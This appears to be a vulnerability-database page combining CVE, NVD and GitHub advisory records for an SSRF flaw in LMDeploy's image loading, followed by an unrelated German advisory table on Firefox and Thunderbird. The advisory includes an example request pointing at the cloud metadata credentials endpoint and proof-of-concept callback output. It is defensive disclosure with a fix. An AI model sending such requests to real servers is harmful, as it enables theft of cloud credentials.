Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-33626 (GCVE-0-2026-33626)
Vulnerability from cvelistv5 – Published: 2026-04-20 20:29 – Updated: 2026-04-21 19:50
VLAI?
EPSS
Title
LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
Severity ?
7.5 (High)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/InternLM/lmdeploy/security/adv… | x_refsource_CONFIRM |
| https://github.com/InternLM/lmdeploy/pull/4447 | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/commit/71d64… | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33626",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-21T17:52:10.383689Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-21T19:50:13.326Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lmdeploy",
"vendor": "InternLM",
"versions": [
{
"status": "affected",
"version": "\u003c 0.12.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-20T20:29:19.558Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"name": "https://github.com/InternLM/lmdeploy/pull/4447",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"name": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"name": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"source": {
"advisory": "GHSA-6w67-hwm5-92mq",
"discovery": "UNKNOWN"
},
"title": "LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33626",
"datePublished": "2026-04-20T20:29:19.558Z",
"dateReserved": "2026-03-23T14:24:11.617Z",
"dateUpdated": "2026-04-21T19:50:13.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-33626",
"date": "2026-05-22",
"epss": "0.08696",
"percentile": "0.92578"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33626\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-20T21:16:35.097\",\"lastModified\":\"2026-04-23T13:39:54.420\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.12.3\",\"matchCriteriaId\":\"208E5C1B-F678-46DA-8CF2-34C2525BF666\"}]}]}],\"references\":[{\"url\":\"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/pull/4447\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading\", \"source\": {\"advisory\": \"GHSA-6w67-hwm5-92mq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"InternLM\", \"product\": \"lmdeploy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.12.3\"}]}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"name\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/pull/4447\", \"name\": \"https://github.com/InternLM/lmdeploy/pull/4447\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\", \"name\": \"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\", \"name\": \"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-20T20:29:19.558Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33626\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-21T17:52:10.383689Z\"}}}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-04-21T17:52:24.672Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33626\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-20T20:29:19.558Z\", \"dateReserved\": \"2026-03-23T14:24:11.617Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-20T20:29:19.558Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-33626
Vulnerability from fkie_nvd - Published: 2026-04-20 21:16 - Updated: 2026-04-23 13:39
Severity ?
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "208E5C1B-F678-46DA-8CF2-34C2525BF666",
"versionEndExcluding": "0.12.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"id": "CVE-2026-33626",
"lastModified": "2026-04-23T13:39:54.420",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-20T21:16:35.097",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-6W67-HWM5-92MQ
Vulnerability from github – Published: 2026-04-21 15:04 – Updated: 2026-04-21 15:04
VLAI?
Summary
LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Details
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The load_image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.
Affected Versions
- Tested on: main branch (2026-02-04)
- Affected: All versions prior to 0.12.3
Vulnerable Code
File: lmdeploy/vl/utils.py (lines 64-67)
def load_image(image_url: Union[str, Image.Image]) -> Image.Image:
# ...
if image_url.startswith('http'):
response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)
# NO VALIDATION OF URL/IP BEFORE REQUEST
Also affected: encode_image_base64() function (lines 26-29)
Root Cause
- No validation of URLs before fetching
- No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
- Server binds to
0.0.0.0by default (api_server.py line 1393) - API keys disabled by default
Attack Scenario
- LMDeploy server deployed with vision-language model
- Attacker sends request to
/v1/chat/completionswith maliciousimage_url:
POST /v1/chat/completions
{
"model": "internlm-xcomposer2",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "Describe this image"},
{"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
]
}]
}
- Server fetches URL without validation
- Attacker receives cloud credentials
Proof of Concept
Verified Exploitation Result
╔═══════════════════════════════════════════════════════════════════════╗
║ LMDeploy SSRF Vulnerability - Proof of Concept ║
╚═══════════════════════════════════════════════════════════════════════╝
[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY
[3] Calling vulnerable load_image() function...
======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
Time: 2026-02-04 16:10:57
Path: /SSRF_PROOF?stolen_data=AWS_SECRET_KEY
Client: 127.0.0.1:51154
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================
✅ SSRF VULNERABILITY CONFIRMED!
Impact
- Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
- Internal Service Access: Reach services not exposed to internet
- Information Disclosure: Port scan internal networks
- Lateral Movement: Pivot point for further attacks
Recommended Fix
from urllib.parse import urlparse
import ipaddress
import socket
BLOCKED_NETWORKS = [
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('169.254.0.0/16'),
]
def is_safe_url(url: str) -> bool:
try:
parsed = urlparse(url)
if parsed.scheme not in ('http', 'https'):
return False
ip = socket.gethostbyname(parsed.hostname)
ip_addr = ipaddress.ip_address(ip)
return not any(ip_addr in network for network in BLOCKED_NETWORKS)
except:
return False
Credit
This vulnerability was discovered as part of Orca Security's research.
Researcher: Igor Stepansky
Organization: Orca Security
Emails:
igor.stepansky@orca.security
iggy.p0pi@orca.security
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lmdeploy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33626"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T15:04:13Z",
"nvd_published_at": "2026-04-20T21:16:35Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.\n\n## Affected Versions\n\n- **Tested on:** main branch (2026-02-04)\n- **Affected:** All versions prior to 0.12.3\n\n## Vulnerable Code\n\n**File:** `lmdeploy/vl/utils.py` (lines 64-67)\n```python\ndef load_image(image_url: Union[str, Image.Image]) -\u003e Image.Image:\n # ...\n if image_url.startswith(\u0027http\u0027):\n response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)\n # NO VALIDATION OF URL/IP BEFORE REQUEST\n```\n\n**Also affected:** `encode_image_base64()` function (lines 26-29)\n\n## Root Cause\n\n1. No validation of URLs before fetching\n2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)\n3. Server binds to `0.0.0.0` by default (api_server.py line 1393)\n4. API keys disabled by default\n\n## Attack Scenario\n\n1. LMDeploy server deployed with vision-language model\n2. Attacker sends request to `/v1/chat/completions` with malicious `image_url`:\n```python\nPOST /v1/chat/completions\n{\n \"model\": \"internlm-xcomposer2\",\n \"messages\": [{\n \"role\": \"user\", \n \"content\": [\n {\"type\": \"text\", \"text\": \"Describe this image\"},\n {\"type\": \"image_url\", \"image_url\": {\"url\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}}\n ]\n }]\n}\n```\n\n3. Server fetches URL without validation\n4. Attacker receives cloud credentials\n\n## Proof of Concept\n\n### Verified Exploitation Result\n```\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 LMDeploy SSRF Vulnerability - Proof of Concept \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n[1] Starting callback server on port 8889...\n[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY\n[3] Calling vulnerable load_image() function...\n\n======================================================================\n[+] SSRF CALLBACK RECEIVED!\n======================================================================\n Time: 2026-02-04 16:10:57\n Path: /SSRF_PROOF?stolen_data=AWS_SECRET_KEY\n Client: 127.0.0.1:51154\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...\n======================================================================\n\n\u2705 SSRF VULNERABILITY CONFIRMED!\n```\n\n## Impact\n\n- **Cloud Credential Theft:** Access AWS/GCP/Azure metadata APIs\n- **Internal Service Access:** Reach services not exposed to internet \n- **Information Disclosure:** Port scan internal networks\n- **Lateral Movement:** Pivot point for further attacks\n\n## Recommended Fix\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\nBLOCKED_NETWORKS = [\n ipaddress.ip_network(\u0027127.0.0.0/8\u0027),\n ipaddress.ip_network(\u002710.0.0.0/8\u0027),\n ipaddress.ip_network(\u0027172.16.0.0/12\u0027),\n ipaddress.ip_network(\u0027192.168.0.0/16\u0027),\n ipaddress.ip_network(\u0027169.254.0.0/16\u0027),\n]\n\ndef is_safe_url(url: str) -\u003e bool:\n try:\n parsed = urlparse(url)\n if parsed.scheme not in (\u0027http\u0027, \u0027https\u0027):\n return False\n ip = socket.gethostbyname(parsed.hostname)\n ip_addr = ipaddress.ip_address(ip)\n return not any(ip_addr in network for network in BLOCKED_NETWORKS)\n except:\n return False\n```\n\n---\n\n## Credit\n\nThis vulnerability was discovered as part of Orca Security\u0027s research.\n\n**Researcher:** Igor Stepansky \n**Organization:** Orca Security \n**Emails:** \nigor.stepansky@orca.security \niggy.p0pi@orca.security",
"id": "GHSA-6w67-hwm5-92mq",
"modified": "2026-04-21T15:04:13Z",
"published": "2026-04-21T15:04:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33626"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"type": "PACKAGE",
"url": "https://github.com/InternLM/lmdeploy"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
WID-SEC-W-2026-1228
Vulnerability from csaf_certbund - Published: 2026-04-21 22:00 - Updated: 2026-05-20 22:00Summary
Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Thunderbird ist ein Open Source E-Mail Client.
Firefox ist ein Open Source Web Browser.
Angriff: Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erhöhen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.
Betroffene Betriebssysteme: - Linux
- Sonstiges
- UNIX
- Windows
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
